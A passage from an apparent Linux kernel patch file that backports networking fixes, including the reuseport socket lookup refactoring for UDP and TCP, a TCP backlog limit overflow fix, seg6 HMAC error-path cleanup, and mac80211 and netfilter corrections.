++		 const __u16 lport, const __be32 faddr,
++		 const __be16 fport)
+ {
+ 	static u32 inet_ehash_secret __read_mostly;
+ 
+@@ -39,6 +39,7 @@ static u32 inet_ehashfn(const struct net *net, const __be32 laddr,
+ 	return __inet_ehashfn(laddr, lport, faddr, fport,
+ 			      inet_ehash_secret + net_hash_mix(net));
+ }
++EXPORT_SYMBOL_GPL(inet_ehashfn);
+ 
+ /* This function handles inet_sock, but also timewait and request sockets
+  * for IPv4/IPv6.
+@@ -338,20 +339,25 @@ static inline int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static inline struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-					    struct sk_buff *skb, int doff,
+-					    __be32 saddr, __be16 sport,
+-					    __be32 daddr, unsigned short hnum)
++INDIRECT_CALLABLE_DECLARE(inet_ehashfn_t udp_ehashfn);
++
++struct sock *inet_lookup_reuseport(struct net *net, struct sock *sk,
++				   struct sk_buff *skb, int doff,
++				   __be32 saddr, __be16 sport,
++				   __be32 daddr, unsigned short hnum,
++				   inet_ehashfn_t *ehashfn)
+ {
+ 	struct sock *reuse_sk = NULL;
+ 	u32 phash;
+ 
+ 	if (sk->sk_reuseport) {
+-		phash = inet_ehashfn(net, daddr, hnum, saddr, sport);
++		phash = INDIRECT_CALL_2(ehashfn, udp_ehashfn, inet_ehashfn,
++					net, daddr, hnum, saddr, sport);
+ 		reuse_sk = reuseport_select_sock(sk, phash, skb, doff);
+ 	}
+ 	return reuse_sk;
+ }
++EXPORT_SYMBOL_GPL(inet_lookup_reuseport);
+ 
+ /*
+  * Here are some nice properties to exploit here. The BSD API
+@@ -375,8 +381,8 @@ static struct sock *inet_lhash2_lookup(struct net *net,
+ 	sk_nulls_for_each_rcu(sk, node, &ilb2->nulls_head) {
+ 		score = compute_score(sk, net, hnum, daddr, dif, sdif);
+ 		if (score > hiscore) {
+-			result = lookup_reuseport(net, sk, skb, doff,
+-						  saddr, sport, daddr, hnum);
++			result = inet_lookup_reuseport(net, sk, skb, doff,
++						       saddr, sport, daddr, hnum, inet_ehashfn);
+ 			if (result)
+ 				return result;
+ 
+@@ -405,7 +411,8 @@ static inline struct sock *inet_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum);
++	reuse_sk = inet_lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum,
++					 inet_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index 69e3317996043..73e66a088e25e 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -58,6 +58,8 @@ __be32 nf_tproxy_laddr4(struct sk_buff *skb, __be32 user_laddr, __be32 daddr)
+ 
+ 	laddr = 0;
+ 	indev = __in_dev_get_rcu(skb->dev);
++	if (!indev)
++		return daddr;
+ 
+ 	in_dev_for_each_ifa_rcu(ifa, indev) {
+ 		if (ifa->ifa_flags & IFA_F_SECONDARY)
+diff --git a/net/ipv4/tcp_dctcp.c b/net/ipv4/tcp_dctcp.c
+index 2a6c0dd665a4c..863aab1860556 100644
+--- a/net/ipv4/tcp_dctcp.c
++++ b/net/ipv4/tcp_dctcp.c
+@@ -57,7 +57,18 @@ struct dctcp {
+ };
+ 
+ static unsigned int dctcp_shift_g __read_mostly = 4; /* g = 1/2^4 */
+-module_param(dctcp_shift_g, uint, 0644);
++
++static int dctcp_shift_g_set(const char *val, const struct kernel_param *kp)
++{
++	return param_set_uint_minmax(val, kp, 0, 10);
++}
++
++static const struct kernel_param_ops dctcp_shift_g_ops = {
++	.set = dctcp_shift_g_set,
++	.get = param_get_uint,
++};
++
++module_param_cb(dctcp_shift_g, &dctcp_shift_g_ops, &dctcp_shift_g, 0644);
+ MODULE_PARM_DESC(dctcp_shift_g, "parameter g for updating dctcp_alpha");
+ 
+ static unsigned int dctcp_alpha_on_init __read_mostly = DCTCP_MAX_ALPHA;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 5dcb969cb5e9c..befa848fb820c 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -1771,7 +1771,7 @@ int tcp_v4_early_demux(struct sk_buff *skb)
+ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 		     enum skb_drop_reason *reason)
+ {
+-	u32 limit, tail_gso_size, tail_gso_segs;
++	u32 tail_gso_size, tail_gso_segs;
+ 	struct skb_shared_info *shinfo;
+ 	const struct tcphdr *th;
+ 	struct tcphdr *thtail;
+@@ -1780,6 +1780,7 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	bool fragstolen;
+ 	u32 gso_segs;
+ 	u32 gso_size;
++	u64 limit;
+ 	int delta;
+ 
+ 	/* In case all data was pulled from skb frags (in __pskb_pull_tail()),
+@@ -1877,7 +1878,13 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	__skb_push(skb, hdrlen);
+ 
+ no_coalesce:
+-	limit = (u32)READ_ONCE(sk->sk_rcvbuf) + (u32)(READ_ONCE(sk->sk_sndbuf) >> 1);
++	/* sk->sk_backlog.len is reset only at the end of __release_sock().
++	 * Both sk->sk_backlog.len and sk->sk_rmem_alloc could reach
++	 * sk_rcvbuf in normal conditions.
++	 */
++	limit = ((u64)READ_ONCE(sk->sk_rcvbuf)) << 1;
++
++	limit += ((u32)READ_ONCE(sk->sk_sndbuf)) >> 1;
+ 
+ 	/* Only socket owner can try to collapse/prune rx queues
+ 	 * to reduce memory overhead, so add a little headroom here.
+@@ -1885,6 +1892,8 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ 	 */
+ 	limit += 64 * 1024;
+ 
++	limit = min_t(u64, limit, UINT_MAX);
++
+ 	if (unlikely(sk_add_backlog(sk, skb, limit))) {
+ 		bh_unlock_sock(sk);
+ 		*reason = SKB_DROP_REASON_SOCKET_BACKLOG;
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 39fae7581d350..b8f93c1479ae1 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -400,9 +400,9 @@ static int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static u32 udp_ehashfn(const struct net *net, const __be32 laddr,
+-		       const __u16 lport, const __be32 faddr,
+-		       const __be16 fport)
++INDIRECT_CALLABLE_SCOPE
++u32 udp_ehashfn(const struct net *net, const __be32 laddr, const __u16 lport,
++		const __be32 faddr, const __be16 fport)
+ {
+ 	static u32 udp_ehash_secret __read_mostly;
+ 
+@@ -412,22 +412,6 @@ static u32 udp_ehashfn(const struct net *net, const __be32 laddr,
+ 			      udp_ehash_secret + net_hash_mix(net));
+ }
+ 
+-static struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-				     struct sk_buff *skb,
+-				     __be32 saddr, __be16 sport,
+-				     __be32 daddr, unsigned short hnum)
+-{
+-	struct sock *reuse_sk = NULL;
+-	u32 hash;
+-
+-	if (sk->sk_reuseport && sk->sk_state != TCP_ESTABLISHED) {
+-		hash = udp_ehashfn(net, daddr, hnum, saddr, sport);
+-		reuse_sk = reuseport_select_sock(sk, hash, skb,
+-						 sizeof(struct udphdr));
+-	}
+-	return reuse_sk;
+-}
+-
+ /* called with rcu_read_lock() */
+ static struct sock *udp4_lib_lookup2(struct net *net,
+ 				     __be32 saddr, __be16 sport,
+@@ -438,15 +422,28 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ {
+ 	struct sock *sk, *result;
+ 	int score, badness;
++	bool need_rescore;
+ 
+ 	result = NULL;
+ 	badness = 0;
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+-		score = compute_score(sk, net, saddr, sport,
+-				      daddr, hnum, dif, sdif);
++		need_rescore = false;
++rescore:
++		score = compute_score(need_rescore ? result : sk, net, saddr,
++				      sport, daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+ 			badness = score;
+-			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++
++			if (need_rescore)
++				continue;
++
++			if (sk->sk_state == TCP_ESTABLISHED) {
++				result = sk;
++				continue;
++			}
++
++			result = inet_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++						       saddr, sport, daddr, hnum, udp_ehashfn);
+ 			if (!result) {
+ 				result = sk;
+ 				continue;
+@@ -460,9 +457,14 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ 			if (IS_ERR(result))
+ 				continue;
+ 
+-			badness = compute_score(result, net, saddr, sport,
+-						daddr, hnum, dif, sdif);
+-
++			/* compute_score is too long of a function to be
++			 * inlined, and calling it again here yields
++			 * measureable overhead for some
++			 * workloads. Work around it by jumping
++			 * backwards to rescore 'result'.
++			 */
++			need_rescore = true;
++			goto rescore;
+ 		}
+ 	}
+ 	return result;
+@@ -485,7 +487,8 @@ static struct sock *udp4_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++	reuse_sk = inet_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++					 saddr, sport, daddr, hnum, udp_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/ipv6/inet6_hashtables.c b/net/ipv6/inet6_hashtables.c
+index b64b49012655e..3616225c89ef6 100644
+--- a/net/ipv6/inet6_hashtables.c
++++ b/net/ipv6/inet6_hashtables.c
+@@ -39,6 +39,7 @@ u32 inet6_ehashfn(const struct net *net,
+ 	return __inet6_ehashfn(lhash, lport, fhash, fport,
+ 			       inet6_ehash_secret + net_hash_mix(net));
+ }
++EXPORT_SYMBOL_GPL(inet6_ehashfn);
+ 
+ /*
+  * Sockets in TCP_CLOSE state are _always_ taken out of the hash, so
+@@ -111,22 +112,27 @@ static inline int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static inline struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-					    struct sk_buff *skb, int doff,
+-					    const struct in6_addr *saddr,
+-					    __be16 sport,
+-					    const struct in6_addr *daddr,
+-					    unsigned short hnum)
++INDIRECT_CALLABLE_DECLARE(inet6_ehashfn_t udp6_ehashfn);
++
++struct sock *inet6_lookup_reuseport(struct net *net, struct sock *sk,
++				    struct sk_buff *skb, int doff,
++				    const struct in6_addr *saddr,
++				    __be16 sport,
++				    const struct in6_addr *daddr,
++				    unsigned short hnum,
++				    inet6_ehashfn_t *ehashfn)
+ {
+ 	struct sock *reuse_sk = NULL;
+ 	u32 phash;
+ 
+ 	if (sk->sk_reuseport) {
+-		phash = inet6_ehashfn(net, daddr, hnum, saddr, sport);
++		phash = INDIRECT_CALL_INET(ehashfn, udp6_ehashfn, inet6_ehashfn,
++					   net, daddr, hnum, saddr, sport);
+ 		reuse_sk = reuseport_select_sock(sk, phash, skb, doff);
+ 	}
+ 	return reuse_sk;
+ }
++EXPORT_SYMBOL_GPL(inet6_lookup_reuseport);
+ 
+ /* called with rcu_read_lock() */
+ static struct sock *inet6_lhash2_lookup(struct net *net,
+@@ -143,8 +149,8 @@ static struct sock *inet6_lhash2_lookup(struct net *net,
+ 	sk_nulls_for_each_rcu(sk, node, &ilb2->nulls_head) {
+ 		score = compute_score(sk, net, hnum, daddr, dif, sdif);
+ 		if (score > hiscore) {
+-			result = lookup_reuseport(net, sk, skb, doff,
+-						  saddr, sport, daddr, hnum);
++			result = inet6_lookup_reuseport(net, sk, skb, doff,
++							saddr, sport, daddr, hnum, inet6_ehashfn);
+ 			if (result)
+ 				return result;
+ 
+@@ -175,7 +181,8 @@ static inline struct sock *inet6_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, doff, saddr, sport, daddr, hnum);
++	reuse_sk = inet6_lookup_reuseport(net, sk, skb, doff,
++					  saddr, sport, daddr, hnum, inet6_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/ipv6/reassembly.c b/net/ipv6/reassembly.c
+index ff866f2a879e0..32ba4417eb1de 100644
+--- a/net/ipv6/reassembly.c
++++ b/net/ipv6/reassembly.c
+@@ -364,7 +364,7 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
+ 	 * the source of the fragment, with the Pointer field set to zero.
+ 	 */
+ 	nexthdr = hdr->nexthdr;
+-	if (ipv6frag_thdr_truncated(skb, skb_transport_offset(skb), &nexthdr)) {
++	if (ipv6frag_thdr_truncated(skb, skb_network_offset(skb) + sizeof(struct ipv6hdr), &nexthdr)) {
+ 		__IP6_INC_STATS(net, __in6_dev_get_safely(skb->dev),
+ 				IPSTATS_MIB_INHDRERRORS);
+ 		icmpv6_param_prob(skb, ICMPV6_HDR_INCOMP, 0);
+diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
+index 35508abd76f43..a31521e270f78 100644
+--- a/net/ipv6/seg6.c
++++ b/net/ipv6/seg6.c
+@@ -551,6 +551,8 @@ int __init seg6_init(void)
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+ out_unregister_genl:
++#endif
++#if IS_ENABLED(CONFIG_IPV6_SEG6_LWTUNNEL) || IS_ENABLED(CONFIG_IPV6_SEG6_HMAC)
+ 	genl_unregister_family(&seg6_genl_family);
+ #endif
+ out_unregister_pernet:
+@@ -564,8 +566,9 @@ void seg6_exit(void)
+ 	seg6_hmac_exit();
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
++	seg6_local_exit();
+ 	seg6_iptunnel_exit();
+ #endif
+-	unregister_pernet_subsys(&ip6_segments_ops);
+ 	genl_unregister_family(&seg6_genl_family);
++	unregister_pernet_subsys(&ip6_segments_ops);
+ }
+diff --git a/net/ipv6/seg6_hmac.c b/net/ipv6/seg6_hmac.c
+index d43c50a7310d6..3c3800223e0e0 100644
+--- a/net/ipv6/seg6_hmac.c
++++ b/net/ipv6/seg6_hmac.c
+@@ -354,6 +354,7 @@ static int seg6_hmac_init_algo(void)
+ 	struct crypto_shash *tfm;
+ 	struct shash_desc *shash;
+ 	int i, alg_count, cpu;
++	int ret = -ENOMEM;
+ 
+ 	alg_count = ARRAY_SIZE(hmac_algos);
+ 
+@@ -364,12 +365,14 @@ static int seg6_hmac_init_algo(void)
+ 		algo = &hmac_algos[i];
+ 		algo->tfms = alloc_percpu(struct crypto_shash *);
+ 		if (!algo->tfms)
+-			return -ENOMEM;
++			goto error_out;
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			tfm = crypto_alloc_shash(algo->name, 0, 0);
+-			if (IS_ERR(tfm))
+-				return PTR_ERR(tfm);
++			if (IS_ERR(tfm)) {
++				ret = PTR_ERR(tfm);
++				goto error_out;
++			}
+ 			p_tfm = per_cpu_ptr(algo->tfms, cpu);
+ 			*p_tfm = tfm;
+ 		}
+@@ -381,18 +384,22 @@ static int seg6_hmac_init_algo(void)
+ 
+ 		algo->shashs = alloc_percpu(struct shash_desc *);
+ 		if (!algo->shashs)
+-			return -ENOMEM;
++			goto error_out;
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			shash = kzalloc_node(shsize, GFP_KERNEL,
+ 					     cpu_to_node(cpu));
+ 			if (!shash)
+-				return -ENOMEM;
++				goto error_out;
+ 			*per_cpu_ptr(algo->shashs, cpu) = shash;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++error_out:
++	seg6_hmac_exit();
++	return ret;
+ }
+ 
+ int __init seg6_hmac_init(void)
+@@ -410,22 +417,29 @@ int __net_init seg6_hmac_net_init(struct net *net)
+ void seg6_hmac_exit(void)
+ {
+ 	struct seg6_hmac_algo *algo = NULL;
++	struct crypto_shash *tfm;
++	struct shash_desc *shash;
+ 	int i, alg_count, cpu;
+ 
+ 	alg_count = ARRAY_SIZE(hmac_algos);
+ 	for (i = 0; i < alg_count; i++) {
+ 		algo = &hmac_algos[i];
+-		for_each_possible_cpu(cpu) {
+-			struct crypto_shash *tfm;
+-			struct shash_desc *shash;
+ 
+-			shash = *per_cpu_ptr(algo->shashs, cpu);
+-			kfree(shash);
+-			tfm = *per_cpu_ptr(algo->tfms, cpu);
+-			crypto_free_shash(tfm);
++		if (algo->shashs) {
++			for_each_possible_cpu(cpu) {
++				shash = *per_cpu_ptr(algo->shashs, cpu);
++				kfree(shash);
++			}
++			free_percpu(algo->shashs);
++		}
++
++		if (algo->tfms) {
++			for_each_possible_cpu(cpu) {
++				tfm = *per_cpu_ptr(algo->tfms, cpu);
++				crypto_free_shash(tfm);
++			}
++			free_percpu(algo->tfms);
+ 		}
+-		free_percpu(algo->tfms);
+-		free_percpu(algo->shashs);
+ 	}
+ }
+ EXPORT_SYMBOL(seg6_hmac_exit);
+diff --git a/net/ipv6/seg6_iptunnel.c b/net/ipv6/seg6_iptunnel.c
+index 34db881204d24..5924407b87b07 100644
+--- a/net/ipv6/seg6_iptunnel.c
++++ b/net/ipv6/seg6_iptunnel.c
+@@ -459,10 +459,8 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 	int err;
+ 
+ 	err = seg6_do_srh(skb);
+-	if (unlikely(err)) {
+-		kfree_skb(skb);
+-		return err;
+-	}
++	if (unlikely(err))
++		goto drop;
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+@@ -487,7 +485,7 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 
+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
+-		return err;
++		goto drop;
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV6, NF_INET_LOCAL_OUT,
+@@ -495,6 +493,9 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 			       skb_dst(skb)->dev, seg6_input_finish);
+ 
+ 	return seg6_input_finish(dev_net(skb->dev), NULL, skb);
++drop:
++	kfree_skb(skb);
++	return err;
+ }
+ 
+ static int seg6_input_nf(struct sk_buff *skb)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 504ea27d08fb0..f55d08d2096ae 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -70,11 +70,12 @@ int udpv6_init_sock(struct sock *sk)
+ 	return 0;
+ }
+ 
+-static u32 udp6_ehashfn(const struct net *net,
+-			const struct in6_addr *laddr,
+-			const u16 lport,
+-			const struct in6_addr *faddr,
+-			const __be16 fport)
++INDIRECT_CALLABLE_SCOPE
++u32 udp6_ehashfn(const struct net *net,
++		 const struct in6_addr *laddr,
++		 const u16 lport,
++		 const struct in6_addr *faddr,
++		 const __be16 fport)
+ {
+ 	static u32 udp6_ehash_secret __read_mostly;
+ 	static u32 udp_ipv6_hash_secret __read_mostly;
+@@ -159,24 +160,6 @@ static int compute_score(struct sock *sk, struct net *net,
+ 	return score;
+ }
+ 
+-static struct sock *lookup_reuseport(struct net *net, struct sock *sk,
+-				     struct sk_buff *skb,
+-				     const struct in6_addr *saddr,
+-				     __be16 sport,
+-				     const struct in6_addr *daddr,
+-				     unsigned int hnum)
+-{
+-	struct sock *reuse_sk = NULL;
+-	u32 hash;
+-
+-	if (sk->sk_reuseport && sk->sk_state != TCP_ESTABLISHED) {
+-		hash = udp6_ehashfn(net, daddr, hnum, saddr, sport);
+-		reuse_sk = reuseport_select_sock(sk, hash, skb,
+-						 sizeof(struct udphdr));
+-	}
+-	return reuse_sk;
+-}
+-
+ /* called with rcu_read_lock() */
+ static struct sock *udp6_lib_lookup2(struct net *net,
+ 		const struct in6_addr *saddr, __be16 sport,
+@@ -186,15 +169,28 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ {
+ 	struct sock *sk, *result;
+ 	int score, badness;
++	bool need_rescore;
+ 
+ 	result = NULL;
+ 	badness = -1;
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+-		score = compute_score(sk, net, saddr, sport,
+-				      daddr, hnum, dif, sdif);
++		need_rescore = false;
++rescore:
++		score = compute_score(need_rescore ? result : sk, net, saddr,
++				      sport, daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+ 			badness = score;
+-			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++
++			if (need_rescore)
++				continue;
++
++			if (sk->sk_state == TCP_ESTABLISHED) {
++				result = sk;
++				continue;
++			}
++
++			result = inet6_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++							saddr, sport, daddr, hnum, udp6_ehashfn);
+ 			if (!result) {
+ 				result = sk;
+ 				continue;
+@@ -208,8 +204,14 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ 			if (IS_ERR(result))
+ 				continue;
+ 
+-			badness = compute_score(sk, net, saddr, sport,
+-						daddr, hnum, dif, sdif);
++			/* compute_score is too long of a function to be
++			 * inlined, and calling it again here yields
++			 * measureable overhead for some
++			 * workloads. Work around it by jumping
++			 * backwards to rescore 'result'.
++			 */
++			need_rescore = true;
++			goto rescore;
+ 		}
+ 	}
+ 	return result;
+@@ -234,7 +236,8 @@ static inline struct sock *udp6_lookup_run_bpf(struct net *net,
+ 	if (no_reuseport || IS_ERR_OR_NULL(sk))
+ 		return sk;
+ 
+-	reuse_sk = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++	reuse_sk = inet6_lookup_reuseport(net, sk, skb, sizeof(struct udphdr),
++					  saddr, sport, daddr, hnum, udp6_ehashfn);
+ 	if (reuse_sk)
+ 		sk = reuse_sk;
+ 	return sk;
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index f25dc6931a5b1..9a5530ca2f6b2 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -5528,7 +5528,8 @@ static void ieee80211_rx_mgmt_beacon(struct ieee80211_link_data *link,
+ 			link->u.mgd.dtim_period = elems->dtim_period;
+ 		link->u.mgd.have_beacon = true;
+ 		ifmgd->assoc_data->need_beacon = false;
+-		if (ieee80211_hw_check(&local->hw, TIMING_BEACON_ONLY)) {
++		if (ieee80211_hw_check(&local->hw, TIMING_BEACON_ONLY) &&
++		    !ieee80211_is_s1g_beacon(hdr->frame_control)) {
+ 			link->conf->sync_tsf =
+ 				le64_to_cpu(mgmt->u.beacon.timestamp);
+ 			link->conf->sync_device_ts =
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index 9d33fd2377c88..a2bc9c5d92b8b 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -877,6 +877,7 @@ void ieee80211_get_tx_rates(struct ieee80211_vif *vif,
+ 	struct ieee80211_sub_if_data *sdata;
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+ 	struct ieee80211_supported_band *sband;
++	u32 mask = ~0;
+ 
+ 	rate_control_fill_sta_table(sta, info, dest, max_rates);
+ 
+@@ -889,9 +890,12 @@ void ieee80211_get_tx_rates(struct ieee80211_vif *vif,
+ 	if (ieee80211_is_tx_data(skb))
+ 		rate_control_apply_mask(sdata, sta, sband, dest, max_rates);
+ 
++	if (!(info->control.flags & IEEE80211_TX_CTRL_SCAN_TX))
++		mask = sdata->rc_rateidx_mask[info->band];
++
+ 	if (dest[0].idx < 0)
+ 		__rate_control_send_low(&sdata->local->hw, sband, sta, info,
+-					sdata->rc_rateidx_mask[info->band]);
++					mask);
+ 
+ 	if (sta)
+ 		rate_fixup_ratelist(vif, sband, info, dest, max_rates);
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index c37e2576f1c13..933d02d7c1284 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -647,6 +647,7 @@ static void ieee80211_send_scan_probe_req(struct ieee80211_sub_if_data *sdata,
+ 				cpu_to_le16(IEEE80211_SN_TO_SEQ(sn));
+ 		}
+ 		IEEE80211_SKB_CB(skb)->flags |= tx_flags;
++		IEEE80211_SKB_CB(skb)->control.flags |= IEEE80211_TX_CTRL_SCAN_TX;
+ 		ieee80211_tx_skb_tid_band(sdata, skb, 7, channel->band);
+ 	}
+ }
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 3d62e8b718740..419baf8efddea 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -720,11 +720,16 @@ ieee80211_tx_h_rate_ctrl(struct ieee80211_tx_data *tx)
+ 	txrc.bss_conf = &tx->sdata->vif.bss_conf;
+ 	txrc.skb = tx->skb;
+ 	txrc.reported_rate.idx = -1;
+-	txrc.rate_idx_mask = tx->sdata->rc_rateidx_mask[info->band];
+ 
+-	if (tx->sdata->rc_has_mcs_mask[info->band])
+-		txrc.rate_idx_mcs_mask =
+-			tx->sdata->rc_rateidx_mcs_mask[info->band];
++	if (unlikely(info->control.flags & IEEE80211_TX_CTRL_SCAN_TX)) {
++		txrc.rate_idx_mask = ~0;
++	} else {
++		txrc.rate_idx_mask = tx->sdata->rc_rateidx_mask[info->band];
++
++		if (tx->sdata->rc_has_mcs_mask[info->band])
++			txrc.rate_idx_mcs_mask =
++				tx->sdata->rc_rateidx_mcs_mask[info->band];
++	}
+ 
+ 	txrc.bss = (tx->sdata->vif.type == NL80211_IFTYPE_AP ||
+ 		    tx->sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index 30374fd44228f..e59e46e07b5c9 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -179,8 +179,6 @@ static int mptcp_setsockopt_sol_socket_int(struct mptcp_sock *msk, int optname,
+ 
+ 	switch (optname) {
+ 	case SO_KEEPALIVE:
+-		mptcp_sol_socket_sync_intval(msk, optname, val);
+-		return 0;
+ 	case SO_DEBUG:
+ 	case SO_MARK:
+ 	case SO_PRIORITY:
+diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
+index 87a9009d5234d..5bc342cb13767 100644
+--- a/net/netfilter/nfnetlink_queue.c
++++ b/net/netfilter/nfnetlink_queue.c
+@@ -167,7 +167,9 @@ instance_destroy_rcu(struct rcu_head *head)
+ 	struct nfqnl_instance *inst = container_of(head, struct nfqnl_instance,
+ 						   rcu);
+ 
++	rcu_read_lock();
+ 	nfqnl_flush(inst, NULL, 0);
++	rcu_read_unlock();
+ 	kfree(inst);
+ 	module_put(THIS_MODULE);
+ }
+diff --git a/net/netfilter/nft_fib.c b/net/netfilter/nft_fib.c
+index 5748415f74d0b..0f17ace972276 100644
+--- a/net/netfilter/nft_fib.c
++++ b/net/netfilter/nft_fib.c
+@@ -34,11 +34,9 @@ int nft_fib_validate(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 	switch (priv->result) {
+ 	case NFT_FIB_RESULT_OIF:
+ 	case NFT_FIB_RESULT_OIFNAME:
+-		hooks = (1 << NF_INET_PRE_ROUTING);
+-		if (priv->flags & NFTA_FIB_F_IIF) {
+-			hooks |= (1 << NF_INET_LOCAL_IN) |
+-				 (1 << NF_INET_FORWARD);
+-		}
++		hooks = (1 << NF_INET_PRE_ROUTING) |
++			(1 << NF_INET_LOCAL_IN) |
++			(1 << NF_INET_FORWARD);
+ 		break;
+ 	case NFT_FIB_RESULT_ADDRTYPE:
+ 		if (priv->flags & NFTA_FIB_F_IIF)
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index f44f2eaf32172..1b001dd2bc9ad 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -44,36 +44,27 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
+ 	int mac_off = skb_mac_header(skb) - skb->data;
+ 	u8 *vlanh, *dst_u8 = (u8 *) d;
+ 	struct vlan_ethhdr veth;
+-	u8 vlan_hlen = 0;
+-
+-	if ((skb->protocol == htons(ETH_P_8021AD) ||
+-	     skb->protocol == htons(ETH_P_8021Q)) &&
+-	    offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
+-		vlan_hlen += VLAN_HLEN;
+ 
+ 	vlanh = (u8 *) &veth;
+-	if (offset < VLAN_ETH_HLEN + vlan_hlen) {
++	if (offset < VLAN_ETH_HLEN) {
+ 		u8 ethlen = len;
+ 
+-		if (vlan_hlen &&
+-		    skb_copy_bits(skb, mac_off, &veth, VLAN_ETH_HLEN) < 0)
+-			return false;
+-		else if (!nft_payload_rebuild_vlan_hdr(skb, mac_off, &veth))
++		if (!nft_payload_rebuild_vlan_hdr(skb, mac_off, &veth))
+ 			return false;
+ 
+-		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
+-			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
++		if (offset + len > VLAN_ETH_HLEN)
++			ethlen -= offset + len - VLAN_ETH_HLEN;
+ 
+-		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);
++		memcpy(dst_u8, vlanh + offset, ethlen);
+ 
+ 		len -= ethlen;
+ 		if (len == 0)
+ 			return true;
+ 
+ 		dst_u8 += ethlen;
+-		offset = ETH_HLEN + vlan_hlen;
++		offset = ETH_HLEN;
+ 	} else {
+-		offset -= VLAN_HLEN + vlan_hlen;
++		offset -= VLAN_HLEN;
